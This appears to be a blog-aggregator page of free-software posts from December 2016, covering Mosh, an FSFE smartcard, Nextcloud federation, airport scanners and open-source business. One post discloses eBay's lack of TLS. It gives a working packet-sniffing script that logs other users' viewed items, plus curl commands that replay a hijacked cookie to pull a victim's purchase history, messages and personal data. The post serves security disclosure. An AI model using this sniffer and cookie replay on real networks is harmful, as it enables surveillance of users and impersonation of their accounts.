Let's look at an example. In Switzerland we have been working hard on a case concerning the release of software developed by a public entity under a Free License. In this case the software is called ‘OpenJustitia’ and is developed by the Swiss Federal Supreme Court. We also published an update where we outlined the steps that have been taken to improve the situation.

This autumn the situation has finally been resolved and local media (Berner Zeitung) even published a small (German) article on that:

Even more, there is now officially a legal right to publish software developed by government institutions under a Free License.

I am sorry that we have not informed you earlier and my personal goal for the next year is to come up with more Good News.

Tuesday, 20 December 2016

Oral history with Jon "Maddog" Hall

free software - Bits of Freedom | 20:49, Tuesday, 20 December 2016

Oral history with Jon

A month ago, I had the opportunity to sit down with Jon "maddog" Hall to interview him for a project on oral history I'm working on. We ended up talking for more than four hours and I have some 67 pages of material from this. As I'm working through the material, I wanted to start by sharing this story with you, in which maddog talks about how secretly sharing Digital source code supported their sale of equipment and services.

It's 1983, I'm working at Digital Equipment Corporation (DEC). And of course I have access to all the source code. I have access to all the engineers. My entire programming life, I’ve always had access to source code of the programs I'm using. And while I was at DEC, I would run into customers who would say “I'm desperate to get the source code for a driver or the source code for this and I can’t get it”.

He'd have to pay 160,000 dollars for an AT&T source code license, 35,000 dollars for a DEC license, 1,200 dollars for the source code distribution and then they would get a magnetic tape.

And a lot of these were universities. And Unix was free to universities: to research universities! If you were a two year technical college, it wasn’t a research university, it was 160,000 dollars per CPU.

So I would say to him, “You know, I think I saw a piece of source code slip off of my desk. Oh, look, it’s gone now. I wonder where it went.” And they would receive the source code in email messages and I would get back a “thank you”.

But I knew that as a product manager, system administrator or programmer: if they couldn't get the source code, they wouldn't buy our operating system. They wouldn't buy our hardware. They wouldn't buy our services. All for this crappy piece of code that they desperately needed to do their business.

When I caught up with maddog recently, he told me he'd do "exactly the same thing today, and for exactly the same reasons".

Saturday, 17 December 2016

Trying out Mosh – the Mobile Shell

Hook’s Humble Homepage | 22:37, Saturday, 17 December 2016

While browsing wikis as I waited for the new kernel to compile on my poor little old ARMv5 server, I stumbled upon Mosh.

On its home page we can find the following description:

Remote terminal application that allows roaming, supports intermittent connectivity, and provides intelligent local echo and line editing of user keystrokes.

Mosh is a replacement for SSH. It's more robust and responsive, especially over Wi-Fi, cellular, and long-distance links.

… but what it boils down to is that if you even just occasionally have to SSH over an unstable WLAN or mobile internet, you should instead use Mosh.

The syntax seems very similar to OpenSSH's and in fact it does run on top of it (at least for authentication; after that it uses its own AES-encrypted SSP over UDP). But the way it works makes sure that even if you lose the connection for a while, the session will resume just fine. It also gets rid of network lag when typing and is in general very responsive.

Mosh is great for logging into remote shells, but you will still need to use OpenSSH for scp and sftp, as Mosh is optimised for character (and not binary) transport. Which is perfectly fine.

This is one of those tools that when you first try it out you simply go “Dear $deity, finally! Why Whhhhyyyyy haven’t I used this before …so many needlessly lost hours with SSH timing out …oh, so many.”

hook out → coming soon: Armbian on Olimex Lime 2 to replace (most) of my current Gentoo on DreamPlug

Thursday, 15 December 2016

Starting to use the Fellowship Card

vanitasvitae's blog » englisch | 13:00, Thursday, 15 December 2016

I recently became a fellow of the FSFE and so I received a nice letter containing the FSFE fellowship OpenPGP smartcard.

After a quick visual examination I approved the card to be *damn cool*, even though the portrait format of the print still confuses me when I look at it. I especially like how optimistically many digits the membership number field has (we can do it!!!). What I don't like is the non-https link on the bottom of the backside.

But how to use it now?

It took me some time to figure out what exactly that card is. The FSFE overview page about the fellowship card is missing the information that this is an OpenPGP V2 card, which might be handy when choosing key sizes later on. I still don't know whether the card is version 2.0 or 2.1, but for my use case it doesn't really matter. So, what exactly is a smart-card and what CAN I actually do with it?

Well, OpenPGP is a system that allows you to encrypt and sign emails, files and other information. That was nothing new to me, but what actually was new to me is the fact that the encryption keys can be stored somewhere other than on the computer or phone. That intrigued me. So why not jump right into it and get some keys on there? But where to plug it in?

My laptop has no smart-card slot, but there is that big ugly slit on one side that never really was of much use to me, simply because most peripherals that I wanted to connect to my computer I connected via beloved USB. It's an ExpressCard slot. I knew that there are extension cards that fit in there so that they aren't in the way (like e.g. a USB dongle would be). There must be smart-card readers for ExpressCards, right? Right. And since I want to read mails when I'm on a train or bus, I find it convenient that the card reader vanishes inside my laptop.

So I went online and searched for ExpressCard smart-card readers. I ended up buying a Lenovo Gemplus smart-card reader for about 25€. Then I waited. After half an hour I asked myself whether that particular device would work well with GNU/Linux (I use Debian testing on my ThinkPad), so I did some research and reassured myself that there are free drivers. Nice!

While I waited for the card reader to arrive, I received another letter with my admin pin for the card. Just for the record ;)

Some days later the smart-card reader arrived and I happily shoved it into the ExpressCard slot. I inserted the card and checked via

gpg --card-status

what's on the card, but I got an error message (unfortunately I don't remember what exactly it was) saying that there was no card available. So I did some more research and it turned out I had to install the package

pcscd

to make it work. After the installation my smart-card was detected, so I could follow the FSFE's tutorial on how to use the card. So I booted into a live Ubuntu that I had lying around, shut off the internet connection, realized that I needed to install pcscd here as well, reactivated the internet, installed pcscd and disconnected again. At that point in time I wondered what exact kind of OpenPGP card I had. Somewhere else (I forgot where) I read that the fellowship card is a version 2.0 card, so I could go full 4096-bit RSA. I generated some new keys, which took forever! While I did so, I wrote some nonsense stories into a text editor to generate enough entropy. It still took about 15 minutes for each key to generate (and a lot of nonsense!). What confused me was the process of removing secret keys and adding them back later (see the tutorial).

But I did it and now I'm the proud owner of a fully functional OpenPGP smart-card + reader. I had some smaller issues with an older GPG key, which I simply revoked (it was about time anyway), and now everything works as intended. I'm a little bit sad because nearly none of my contacts use GPG/PGP, so I had to write mails to myself in order to test the card, but that feeling when that little window opens, asking me to insert my card and/or enter my pin, makes up for everything :)

My main use case for the card became signing git commits, though. Via

git commit -S -m "message"

git commits can be signed with the card (this works with normal gpg keys without a card as well)! You just have to add your key's fingerprint to your .gitconfig. Man, that really adds to the experience. Now every time I sign a commit, I feel as if my work is extremely important or I'm a top secret agent or something. I can only recommend that to everyone!

Of course, I know that I might sound a little silly in the last paragraph, but nevertheless, I hope I could at least entertain somebody with my first experiences with the FSFE fellowship card. What I would add to the wish list for a next version of the card is a little field to note the last digits of the fingerprint of the key that's stored on the card. That could be handy for remembering the fingerprint when there is no card reader available. Also it would be quite nice if the card were usable in combination with smartphones, even though I don't know how exactly that could be accomplished (maybe a USB connector on the card?)

Anyways that’s the end of my first blog post. I hope you enjoyed it. Btw: My GPG key has the ID 0xa027db2f3e1e118a :)

Edit: This is a repost from October. In the meantime, I lost my admin pin, because I generated it with KeePassX and did not click on "accept" afterwards. That's a real issue that should be addressed by the developers, but that's another story. I can still use the card, but I can't change the key on it, so some day I'll have to order a new card.

vanitasvitae

Tuesday, 13 December 2016

Rename This Project

Paul Boddie's Free Software-related blog » English | 17:35, Tuesday, 13 December 2016

It is interesting how the CPython core developers appear to prefer to spend their time on choosing names for someone else’s fork of Python 2, with some rather expansionist views on trademark applicability, than on actually winning over Python 2 users to their cause, which is to make Python 3 the only possible future of the Python language, of course. Never mind that the much broader Python language community still appears to have an overwhelming majority of Python 2 users. And not some kind of wafer-thin, “first past the post”, mandate-exaggerating, Brexit-level majority, but an actual “that doesn’t look so bad but, oh, the scale is logarithmic!” kind of majority.

On the one hand, there are core developers who claim to be very receptive to the idea of other people maintaining Python 2, because the CPython core developers have themselves decided that they cannot bear to look at that code after 2020 and will not issue patches, let alone make new releases, even for the issues that have been worthy of their attention in recent years. Telling people that they are completely officially unsupported applies yet more “stick” and even less “carrot” to those apparently lazy Python 2 users who are still letting the side down by not spending their own time and money on realising someone else’s vision. But apparently, that receptivity extends only so far into the real world.

One often reads and hears claims of “entitlement” when users complain about developers or the output of Free Software projects. Let it be said that I really appreciate what has been delivered over the decades by the Python project: the language has kept programming an interesting activity for me; I still to this day maintain and develop software written in Python; I have even worked to improve the CPython distribution at times, not always successfully. But it should always be remembered that even passive users help to validate projects, and active users contribute in numerous ways to keep projects viable. Indeed, users invest in the viability of such projects. Without such investment, many projects (like many companies) would remain unable to fulfil their potential.

Instead of inflicting burdensome change whose predictable effect is to cause a depreciation of the users’ existing investments and to demand that they make new investments just to mitigate risk and “keep up”, projects should consider their role in developing sustainable solutions that do not become obsolete just because they are not based on the “latest and greatest” of the technology realm’s toys. If someone comes along and picks up this responsibility when it is abdicated by others, then at the very least they should not be given a hard time about it. And at least this “Python 2.8” barely pretends to be anything more than a continuation of things that came before, which is not something that can be said about Python 3 and the adoption/migration fiasco that accompanies it to this day.

Cloud Federation – Getting Social

English – Björn Schießle's Weblog | 10:45, Tuesday, 13 December 2016

Clouds getting Social

With Nextcloud 11 we continue to work on one of our hot topics: Cloud Federation. This time we focus on the social aspects. We want to make it as easy as possible for people to share their contact information, which enables users to find each other and start sharing. Therefore we extended the user profile in the personal settings. As the screenshot at the top shows, users can now add a wide range of information to their personal settings and define the visibility of each item by clicking on the small icon next to it.

Privacy first

Change visibility of personal settings

We take your privacy seriously. That's why we provide fine-grained options to define the visibility of each personal setting. By default all new settings will be private, and all settings which existed before will keep the same visibility as on Nextcloud 10 and earlier. This means that the user's full name and avatar will only be visible to users on the same Nextcloud server, e.g. through the share dialog. If enabled by the administrator, these values, together with the user's email address, will be synced with trusted servers to allow users from trusted servers to share with each other seamlessly.

As shown in the screenshot on the right, we provide three levels of visibility: “Private”, “Contacts” and “Public”. Private settings will only be visible to you; even users on the same server will not have access to them. The only exceptions are the avatar and the full name, because these are central data used by Nextcloud for activities, internal shares, etc. Settings which are set to “Contacts” will be shared with users on the same server and with trusted servers, as defined by the administrator of the Nextcloud server. Public data will be synced to a global and public address book.

Introducing the global address book

The best real-world equivalent to the global address book is a telephone directory. For a new phone number, people can choose to publish it together with their name and address in a public telephone directory to enable other people to find them. The global address book follows the same pattern. By default nothing gets published to the global address book; data is only published if the user sets at least one value in their personal settings to “Public”. In this case all the public data will be synced to the global address book together with the user's Federated Cloud ID. Users can remove their data again at any time by simply setting their personal data back to “Contacts” or “Private”.
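As a toy illustration of that rule (this is not Nextcloud code; the published_profile function and the field names are invented for this post), only the fields marked “Public” end up in the payload for the global address book, and nothing is sent at all unless at least one field is public:

# Toy model of the publishing rule described above; not Nextcloud code.
def published_profile(settings, federated_cloud_id):
    """settings maps a field name to a (value, visibility) pair."""
    public = {field: value
              for field, (value, visibility) in settings.items()
              if visibility == "Public"}
    if not public:
        return None  # nothing is "Public": the user stays out of the global address book
    public["federated_cloud_id"] = federated_cloud_id
    return public

# Only the website is public here, so only it (plus the Cloud ID) would be synced.
print(published_profile(
    {"email": ("jane@example.org", "Contacts"),
     "website": ("https://example.org", "Public")},
    "jane@cloud.example.org"))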

In order to use the global address book as a source to find new people, this lookup needs to be enabled explicitly by the administrator in the “Federated Cloud Sharing” settings. For privacy reasons this is disabled by default. If enabled, the share dialog of Nextcloud will query the global address book every time a user wants to share a file or folder, and suggest people found there. In the future there might be a dedicated button to access the global address book, both for performance reasons and to make the feature more discoverable.

Future work

The global address book can return many results for a given name. How do we know that we are sharing with the right person? That is why we want to add the possibility to verify the user's email address, website and Twitter handle in Nextcloud 12. As soon as this feature is implemented, the global address book will only return users for whom at least one personal setting is verified, and it will also visualize the verified data so that the user can use this information to pick the right person.

Further, I want to extend the meaning of “Contacts” in one of the next versions. The idea is that “Contacts” should not be limited to trusted servers but should include the user's personal contacts. For example, the data set to “Contacts” could be shared with every person with whom the user has already established at least one federated share successfully, or with all contacts with a Federated Cloud ID in the user's personal address book. This way we will move slowly in the direction of some kind of decentralized and federated social network based on the user's address book. This will also enable users to easily push their new phone number or other personal data to all their friends and colleagues, things for which most people use centralized and proprietary services like so-called “business networks” these days.

Another interesting possibility, made possible by the global address book, is moving complete user accounts from one server to another. Provided that the user has published at least some basic information in the global address book, they could use it to announce their move to another server. Other Nextcloud servers could find this information and make sure that existing federated shares continue to work.

Saturday, 10 December 2016

The Internet of Dangerous Auction Sites

Iain R. Learmonth | 21:25, Saturday, 10 December 2016

It might be that the internet era of fun and games is over, because the internet is now dangerous. – Bruce Schneier

Ok, I know this is kind of old news now, but Bruce Schneier gave testimony to the House of Representatives’ Energy & Commerce Committee about computer security after the Dyn attack. I’m including this quote because I feel it sets the scene nicely for what follows here.

Last week, I was browsing the popular online auction site eBay and I noticed that there was no TLS. For a moment, I considered that maybe my traffic was being intercepted deliberately; surely there was no way that eBay, as a global company, would be deliberately putting users at risk in this way. I was wrong. There is not and has never been TLS for large swathes of the eBay site. In fact, the only point at which I've found TLS is in their help pages and when it comes to entering card details (although it'll give you back the last 4 digits of your card over a plaintext channel).

sudo apt install wireshark
# You'll want to allow non-root users to perform capture
sudo adduser `whoami` wireshark
# Log out and in again to assume the privileges you've granted yourself

What can you see?

The first thing I'd like to call eBay out on is a statement in their webpage about Cookies, Web Beacons, and Similar Technologies:

We don’t store any of your personal information on any of our cookies or other similar technologies.

Well eBay, I don't know about you, but for me my name is personal information. Ana, who investigated this with me, also confirmed that her name was present in her cookie when using her account. But to answer the question, you can see pretty much everything.

Using the Observer module of PATHspider, which is essentially a programmable flow meter, let’s take a look at what items users of the network are browsing:

sudo apt install pathspider

The following is a Python 3 script that you’ll need to run as root (for packet capturing) and will need to kill with ^C when you’re done because I didn’t give it an exit condition:

import logging
import queue
import threading
import email
import re
from io import StringIO

import plt

from pathspider.observer import Observer

from pathspider.observer import basic_flow
from pathspider.observer.tcp import tcp_setup
from pathspider.observer.tcp import tcp_handshake
from pathspider.observer.tcp import tcp_complete

def tcp_reasm_setup(rec, ip):
        rec['payload'] = b''
        return True

def tcp_reasm(rec, tcp, rev):
        if not rev and tcp.payload is not None:
                rec['payload'] += tcp.payload.data
        return True

lturi = "int:wlp3s0" # CHANGE THIS TO YOUR NETWORK INTERFACE
logging.getLogger().setLevel(logging.INFO)
logger = logging.getLogger(__name__)
ebay_itm = re.compile("(?:item=|itm(?:\/[^0-9][^\/]+)?\/)([0-9]+)")

o = Observer(lturi,
             new_flow_chain=[basic_flow, tcp_setup, tcp_reasm_setup],
             tcp_chain=[tcp_handshake, tcp_complete, tcp_reasm])
q = queue.Queue()
t = threading.Thread(target=o.run_flow_enqueuer,
                     args=(q,),
                     daemon=True)
t.start()

while True:
    f = q.get()
    # www.ebay.co.uk uses keep alive for connections, multiple requests
    # may be in a single flow
    requests = [x + b'\r\n' for x in f['payload'].split(b'\r\n\r\n')]
    for request in requests:
        if request.startswith(b'GET '):
            request_text = request.decode('ascii')
            request_line, headers_alone = request_text.split('\r\n', 1)
            headers = email.message_from_file(StringIO(headers_alone))
            if headers['Host'] != "www.ebay.co.uk":
                break
            itm = ebay_itm.search(request_line)
            if itm is not None and len(itm.groups()) > 0 and itm.group(1) is not None:
                logging.info("%s viewed item %s", f['sip'],
                             "http://www.ebay.co.uk/itm/" + itm.group(1))

Note: PATHspider’s Observer won’t emit a flow until it is completed, so you may have to close your browser in order for the TCP connection to be closed as eBay does use Connection: keep-alive.

If all is working correctly (if it was really working correctly, it wouldn’t be working because the connections would be encrypted, but you get what I mean…), you’ll see something like:

INFO:root:172.22.152.137 viewed item http://www.ebay.co.uk/itm/192045666116
INFO:root:172.22.152.137 viewed item http://www.ebay.co.uk/itm/161990905666
INFO:root:172.22.152.137 viewed item http://www.ebay.co.uk/itm/311756208540
INFO:root:172.22.152.137 viewed item http://www.ebay.co.uk/itm/131911806454
INFO:root:172.22.152.137 viewed item http://www.ebay.co.uk/itm/192045666116

It is left as an exercise to the reader to map the IP addresses to users. You do however have the hint that the first name of the user is in the cookie.

This was a very simple example; you can also passively sniff the content of messages sent and received on eBay (though I'll admit email has the same flaw in a large number of cases) and you can also see the purchase history and cart contents when those screens are viewed. Ana also pointed out that when you browse for items at home, eBay may recommend similar items to you, and then those recommendations would also be available to anyone viewing the traffic at your workplace.

Perhaps you want to see the purchase history but you’re too impatient to wait for the user to view the purchase history screen. Don’t worry, this is also possible.

Three researchers from the Department of Computer Science at Columbia University, New York published a paper earlier this year titled The Cracked Cookie Jar: HTTP Cookie Hijacking and the Exposure of Private Information. In this paper, they talk about hijacking cookies using packet capture tools and then using the cookies to impersonate users when making requests to websites. They also detail in this paper a number of concerning websites that are vulnerable, including eBay.

Yes, it’s 2016, nearly 2017, and cookie hijacking is still a thing.

You may remember Firesheep, a Firefox plugin, that could be used to hijack Facebook, Twitter, Flickr and other websites. It was released in October 2010 as a demonstration of the security risk of session hijacking vulnerabilities to users of web sites that only encrypt the login process and not the cookie(s) created during the login process. Six years later and eBay has not yet listened.

So what is cookie hijacking all about? Let’s get hands on. This time, instead of looking at the request line, look at the Cookie header. Just dump that out. Something like:

print(headers['Cookie'])
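If you want to see which individual fields in that cookie carry personal data (such as the first name mentioned earlier), a small sketch along these lines splits the header into name/value pairs using Python's standard http.cookies module; the dump_cookie_fields helper is made up for this post, and the field names it prints are simply whatever eBay happens to send:

import logging
from http.cookies import SimpleCookie

def dump_cookie_fields(sip, cookie_header):
    # Split the raw Cookie request header into individual morsels so the
    # interesting ones can be spotted by eye.
    jar = SimpleCookie()
    jar.load(cookie_header)
    for name, morsel in jar.items():
        logging.info("%s cookie field %s=%s", sip, name, morsel.value)

Calling dump_cookie_fields(f['sip'], headers['Cookie']) inside the loop above would list every field next to the source address.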

Now you have the user’s cookie and you can impersonate that user. Store the cookie in an environment variable named COOKIE and…

sudo apt install curl
# Get the purchase history
curl --cookie "$COOKIE" http://www.ebay.co.uk/myb/PurchaseHistory > history.html
# Get the current cart contents
curl --cookie "$COOKIE" http://cart.payments.ebay.co.uk/sc/view > cart.html
# Get the current bids/offers
curl --cookie "$COOKIE" http://www.ebay.co.uk/myb/BidsOffers > bids.html
# Get the messages list
curl --cookie "$COOKIE" http://mesg.ebay.co.uk/mesgweb/ViewMessages/0 > messages.html
# Get the watch list
curl --cookie "$COOKIE" http://www.ebay.co.uk/myb/WatchList > watch.html

I’m sure you can use your imagination for more. One of my favourites is…

# Get the personal information
curl --cookie "$COOKIE" "http://my.ebay.co.uk/ws/eBayISAPI.dll?MyeBay&CurrentPage=MyeBayPersonalInfo&gbh=1&ssPageName=STRK:ME:LNLK" > personal.html

This one will give you the secret questions (but not the answers) and the last 4 digits of the registered card for a seller account. In the case of Mat Honan in 2012, the last 4 digits of his card number led to the loss of his Twitter account.

The techniques I've shown here do not seem to care where the request comes from. We tested using my cookie from Ana's laptop and also tried from a server hosted in the US (our routing origin is in Germany, so this should perhaps have been a red flag). I could not find any interface through which I could query my login history, so I'm not sure what it would have shown.

I'm not a security researcher, though I do work as an Internet Engineering researcher. I'm publishing this as these vulnerabilities have already been disclosed in the paper I linked above, and I believe this is something that needs attention. Every time over the last week that I pointed out to someone that eBay does not use TLS, they were surprised, and often horrified.

You might think that better validation of the source of the cookie might help, for instance, rejecting requests that suddenly come from other countries. As long as the attacker is on the path they have the ability to create flows that impersonate the host at the network layer. The only option here is to encrypt the flow and to ensure a means of authenticating the server, which is exactly what TLS provides.

You might think that such attacks may never occur, but active probes in response to passive measurements have been observed. I would think that having all these cookies floating around the Internet is really just an invitation for those cookies to be abused by some intelligence service (or criminal organisation). I would be very surprised if such ideas had not already been explored, if not implemented, on a large scale.

Please Internet, TLS already.

Tuesday, 06 December 2016

Rejection of voluntary naked scanner at airport

Matthias Kirschner's Web log - fsfe | 23:17, Tuesday, 06 December 2016

On my way to the OGP summit in Paris I experienced what happens when you reject the voluntary naked scanner/body scanner. There are signs before security saying that this scan is voluntary and that you should tell the security personnel if you do not want it. That is what I did, and here is my account of what happened at Berlin Schönefeld this morning.

Naked Scanner

I asked the first security officer which queue I had to use if I did not want to use the naked scanner (~7:25am). He said I had to use it. After I told him that the signs say it is voluntary, he explained to me that it is not really a naked scanner, but that they just see the contours of the body. We agreed that I would talk with the other officers who operate the machines.

After unpacking my laptop and liquids, I told the other security officer that I preferred the "manual treatment" (that is what they call it on the signs). He referred me to the colleague operating the machine. I was asked why I did not want it, and I said because of data protection. Then I got the "manual control", which means that someone gives you the normal body massage. Afterwards they immediately tested my clothing for signs of explosives.

Then the second officer brought me to my luggage and asked me to unpack everything for another scan of my belongings. During that he asked me why I had refused the "body scanner" and there was some back and forth. As always I stayed friendly the whole time, as I know that for the officers my behaviour meant more work, and that they were following orders. He explained to me that they just see the contours and nothing else. I told him that I do not trust what data about my body shape is saved and where it is stored. During the talk I also told him that what they see on their screens and what is saved on disk can be different things, and that just because they cannot access files from before does not mean they are not stored.

In that conversation he also explained to me that they have to ask for the reasons why I am not doing the (see above: "voluntary") check, and evaluate whether they are plausible or whether I am covering something up. Pregnancy or implants would be a plausible reason. When I asked about data protection he said that it is not a plausible reason, and that in such cases they would also have to ask the police to check you again.

After my luggage was scanned the second time and I had all my belongings in the bag again, they said they would now have to do the testing for signs of explosives. I told them that I had already been checked for that, but they said that now my luggage would be checked. Well, so be it; after yet another check I can assure you that I am now quite sure that neither I nor my belongings were in contact with explosives recently.

In the end the officer urged me to please inform myself again about the scanner to prevent such long procedures in the future. Actually it was not that long; the procedure was over at ~7:45am. I wished them a nice day, left and wrote this blog post. I have to say I am concerned that people have to justify declining something which is supposed to be voluntary.

Now preparing the meeting in Paris...


Update 2016-12-09 14:24: I received many interesting comments about this post, especially on the corresponding tweet and in the comments on the BoingBoing article. Thanks to all of you who shared their experience and ideas on the subject there or by e-mail.

Documenting DUCK

David Boddie - Updates (Full Articles) | 17:35, Tuesday, 06 December 2016

Having recently considered restarting work on my Dalvik compiler tools, I thought I should at least try and improve some of the documentation that accompanies the project, beginning with the example applications.

The examples are written in a Python-like language that I called Serpentine. Programs written in this language are syntactically valid Python source code, but they wouldn't run in a Python interpreter even if you had a set of replacement modules for all the Java and Android libraries. (As an aside, my brother wrote a partial set of compatibility modules for the Java standard library as part of his javaclass project many years ago.) The incompatibility between the languages is intentional. I wanted to be able to write programs that would be represented using as few virtual machine instructions as possible and, since the virtual machine is designed for a statically-typed language with primitive types, I was comfortable with imposing restrictions on how the language uses types to make the compilation process as simple as possible.

It would be possible to implement more dynamic, Python-like types on top of the primitive types but this could lead to inefficiencies at run-time or, at the very least, a more complicated compiler. Since the overall goal was to have a language that resembled Python enough to make Android programming familiar to a Python programmer, implementing all the semantic features of Python is not really a priority, especially since programmers have to face up to the platform APIs at some point.

Inline Documentation

One of the other areas where I decided to experiment with non-Python-like behaviour is in the use of docstrings, the short text descriptions that follow the start of modules, classes and functions. These are handled specially by the standard Python parser so that they don't get mixed into the code that the CPython interpreter wants to run. However, when parsing code for other purposes, this can be a bit of a disadvantage. One thing I wanted to do was to interleave descriptive strings throughout a program and process them to create a document that combines text and source code. Having the docstrings stored separately from other nodes in an abstract syntax tree makes the task of doing this processing a bit more tedious since we need to work out where the original strings were in the source code.
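As a rough sketch of that kind of processing (this is not the project's actual tooling, just an illustration using the ast module of a recent Python 3; the to_markdown function is made up here), one can walk the module body, emit bare string expressions as prose and everything else as indented code blocks:

# Illustrative only: interleave bare string expressions with the code
# around them to produce a Markdown document. Requires Python 3.8+ for
# the end_lineno attribute on AST nodes.
import ast

def to_markdown(source):
    lines = source.splitlines()
    chunks = []
    for node in ast.parse(source).body:
        is_text = (isinstance(node, ast.Expr)
                   and isinstance(node.value, ast.Constant)
                   and isinstance(node.value.value, str))
        if is_text:
            # A bare string at module level becomes prose in the output.
            chunks.append(node.value.value.strip())
        else:
            # Everything else is reproduced as an indented code block.
            chunks.append("\n".join("    " + line
                                    for line in lines[node.lineno - 1:node.end_lineno]))
    return "\n\n".join(chunks)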

The Mercurial repository for the project is currently residing on Bitbucket, which is less than ideal from a Free Software perspective. However, we can take advantage of the service's Markdown support to automatically render files marked up in this language. Since Markdown tends to be supported by other services and tools, we are not locked into this service and could easily migrate the repository elsewhere, processing the documentation differently if required. Since Markdown is not so different to reStructuredText, we could even just generate documentation using Sphinx with not too much effort.

The end result is that inline text from the examples is interleaved with the source code to produce text in Markdown format. When the contents of the repository are viewed in a browser, this text is processed and rendered as regular HTML by the hosting service, making it easier to read about the examples provided with the compiler.

Although I haven't used this approach for the compiler itself, I think that it might be interesting to try it. The style of documentation I am used to writing is focused on how programmers use library APIs, but documenting the internal structure of a project is a different kind of task. Perhaps I'll experiment with a combination of the two approaches to try and get the best of both worlds.

Categories: Free Software, Android, Documentation

Saturday, 03 December 2016

Conquer the World with Open Source

Blog – Think. Innovation. | 15:38, Saturday, 03 December 2016

Last week I had the privilege and pleasure to give a talk at the Open Source Software and Hardware Congres (OSSH Event) in Den Bosch, The Netherlands. Since I got some positive reactions to this talk, I decided to write this Blog Post about it, containing the main points.

The organization asked me to talk about “earning money with Open Source”, a topic I have been talking about at several other conferences. However, this time I decided not to just focus on explaining various Open Source Revenue Models, but instead to focus more on the disruptive global successes an Open Source Strategy can bring about. Hence the somewhat grandiose title of my talk: Conquer the World with Open Source.

In the talk I aimed to explain how some companies have become hugely successful by choosing the unconventional way, by having the guts to do it differently and adopting Open Source as a Strategy. What I mean by this is that Open Source forms a vital part of the Value Proposition of a company. This is opposed to merely regarding and using Open Source Software (and increasingly Hardware) as an alternative to Proprietary products for running your business.

Remark: most of the other talks at OSSH were about the pros and cons of using Open Source Software in a regular business, including a lot about security-related matters. Interesting exceptions were the talks by RedHat about the Internet of Things and by Smart Robotics about ROS Open Source Robotics.

My talk included three case studies of “Big Conquerors” from Open Source Software, three case studies of “Small Conquerors” from the emerging Open Source Hardware movement, and some tips for those who are interested in becoming an Open Source Conqueror.

The Big Conquerors in Open Source Software

As the Innovation Model of Open Source was invented as a Software Development and Distribution practice and has been around for a long time, this is where the biggest successes can be found:

“Build a Multinational with Open Source” (RedHat)

RedHat has shown that building a multinational company is possible, and its clients, employees, and the entire community are benefiting from its success. This year (2016) RedHat will make over $2 billion in revenue, the first Open Source company to do so.

Starting in 1993, it now has 9300 employees and serves its customers in 35 countries. For those unfamiliar with the company: RedHat mainly provides support and services around Open Source Software like GNU/Linux, but also provides Cloud and IoT solutions, consultancy and training.

“Become Market Leader by adopting an Open Source Strategy” (Android)

About a decade ago (2007) Google released the first version of its Open Source Operating System for smartphones: Android. Seeing the vastly growing market for mobile phones and particularly smartphones, Google decided it could not afford to be left out and chose an Open Source strategy.

The result: as Apple’s iOS started pushing aside Palm, BlackBerry and Windows, the market leaders at the time, Android overtook iOS in just a couple of years. At the moment almost 90% of all smartphones sold run on an Open Source OS, with GNU/Linux at the core.

However, some critical remarks can also be made about Google’s strategy for Android. Google is turning more and more of the apps that used to be Open Source into proprietary components of the OS, and through the Open Handset Alliance the company keeps a serious lock on all companies producing phones with Android and Google’s flagship apps like GMail, Google Play and Google Maps. Not so Open, actually: if a company produces phones with these flagship apps, it has to include ALL of them and is forbidden to produce phones that run a fork (another version) of Android.

“Make Global Impact by Open Sourcing your Product” (WordPress)

It was 2003 and the market for Content Management Systems (CMS) was still highly volatile and developing rapidly. At that time it was still normal to build your own (general-purpose) CMS, or at least to consider the possibility. WordPress changed that, by becoming the best CMS around and Open Sourcing it to make a global impact.

At the moment 25% of the top 10 million websites run WordPress, and the ecosystem of premium themes, plug-ins, customizations and implementations is said to be a ‘Billion Dollar Ecosystem’, although this number is very hard to calculate given the distributed, decentralized nature of Open Source.

The Software as a Service (SaaS) version of the CMS, wordpress.com, serves 76 million blogs. It is amazing that WordPress, or rather Automattic, the company behind the product, has made all of this possible with just around 400 employees.

By comparison: Twitter has 10 times as many employees and Facebook 40 times.

The Small Conquerors in Open Source Hardware

Given the success of Open Source in Software, we now see ‘a transition from bits to atoms’ in which this innovation model is being experimented with, tested and eventually re-invented to be compatible with and successful for Hardware. Some very promising Open Source Hardware companies exist nowadays and we can learn a lot and draw inspiration from these cases:

“Define the de-facto Standard” (Arduino)

A little over 10 years ago (2005) a group of researchers and university students in Italy were looking for a way to allow their students to quickly include electronics in their art projects. At that time you needed to be a trained embedded systems engineer and a software engineer if you wanted to do anything more advanced with electronics.

For this reason the group developed a small basic micro-controller board which could be easily connected and extended with modules. Furthermore, they built a program to be able to easily develop software for it, called an Integrated Development Environment (IDE).

The Arduino project was born and the group soon saw a huge demand for the product coming from everywhere. They decided to start producing and selling the Arduino products in larger quantities, expanding globally. Also, because all of the designs, documentation and code were Open Source, many clones came onto the market, hoping to be in the slipstream of this success.

Today Arduino is the de-facto standard for any educational, art, hobby and even professional electronics prototyping project, especially given the huge IoT hype. The Arduino project is believed to have made around € 50 million in revenue to date, and the webshop Adafruit sells € 250,000 in Arduino products each month. And note: these are the official, original or certified Arduino products, not the clones, which sell many times that.

“Disrupt the Supply Chain” (OpenDesk)

OpenDesk is an interesting case as it is trying to build an open platform for furniture, mainly desks and tables, where the client directly connects with the designer and maker. The idea is that only information is transported globally and the physical products are made locally by manufacturers called ‘makers’ using computer controlled machinery, like CNC Routers.

A client requests a desk to be made and a request for proposal goes out to local makers. When the client decides to buy the product, the local maker builds it, and every party involved gets a piece of the financial pie: the designer, the platform, the channel and the maker are all paid a fair share.

OpenDesk calls itself the “IKEA of the 21st century”, but since the furniture costs a multiple of IKEA’s prices, I think it is mainly an interesting experiment to figure out how to make this rather complicated Open Source platform model work.

A side note: the designers choose the license to share their work under and most of them choose to use a ‘non-commercial’ license, which means that most of OpenDesk’s designs are not Open Source.

“Overtake the Big Boys” (The Things Network)

A few years ago a conglomerate of multinational corporations decided to set a new standard for Machine to Machine (M2M) communications, to be able to service the upcoming Internet of Things industry. This conglomerate is called the LoRa Alliance and the communication protocol is released as an open standard.

Then in 2015 a small group of people in Amsterdam decided to take advantage of this openness and were able to set up a city-wide network in just six weeks, with a relatively small amount of investment. The initiative was a huge success and got tons of media attention: The Things Network (TTN) was born.

Now TTN defines itself as a distributed, community-owned, open source IoT network. The movement has expanded globally, forming local communities everywhere. At the moment it spans 60 countries, with over 200 communities and a total of 900 active gateways.

Their Kickstarter campaign, aiming to bring the cheap hardware they developed themselves to the market, was a huge success, bringing in almost € 300,000, twice the intended amount.

